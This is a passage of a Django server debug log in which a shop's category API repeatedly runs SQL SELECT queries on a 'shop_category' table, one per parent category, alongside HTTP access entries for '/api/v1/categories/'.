"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 14:06:16,244 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 14:06:16,246 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 14:06:16,248 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 14:06:16,251 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 14:06:16] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-07 14:07:50,220 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 14:07:50,228 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 14:07:50,232 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 14:07:50,235 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 14:07:50,239 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 14:07:50,243 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 14:07:50,247 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 14:07:50,251 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 14:07:50,255 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 14:07:50,259 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 14:07:50,262 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 14:07:50] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-07 14:08:20,753 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 14:08:20,761 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 14:08:20,765 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 14:08:20,768 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 14:08:20,772 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 14:08:20,775 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 14:08:20,777 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 14:08:20,779 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 14:08:20,782 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 14:08:20,784 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 14:08:20,786 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 14:08:20] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-07 14:08:37,322 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 14:08:37,326 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 14:08:37,328 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 14:08:37,330 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 14:08:37,333 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 14:08:37,335 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 14:08:37,337 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 14:08:37,339 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 14:08:37,341 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 14:08:37,343 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 14:08:37,345 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 14:08:37] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-07 14:09:07,894 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 14:09:07,899 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 14:09:07,901 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 14:09:07,904 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 14:09:07,906 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 14:09:07,909 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 14:09:07,911 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 14:09:07,913 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 14:09:07,916 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 14:09:07,918 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 14:09:07,920 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 14:09:07] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-07 14:09:16,470 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 14:09:16,475 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 14:09:16,478 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 14:09:16,480 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 14:09:16,483 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 14:09:16,486 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 14:09:16,489 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 14:09:16,491 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 14:09:16,493 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 14:09:16,496 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 14:09:16,498 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 14:09:16] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 14:10:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 14:15:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 14:16:19,734 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 14:16:19,742 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 14:16:19,747 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 14:16:19,751 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 14:16:19,756 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 14:16:19,760 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 14:16:19,764 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 14:16:19,768 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 14:16:19,772 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 14:16:19,776 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 14:16:19,780 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 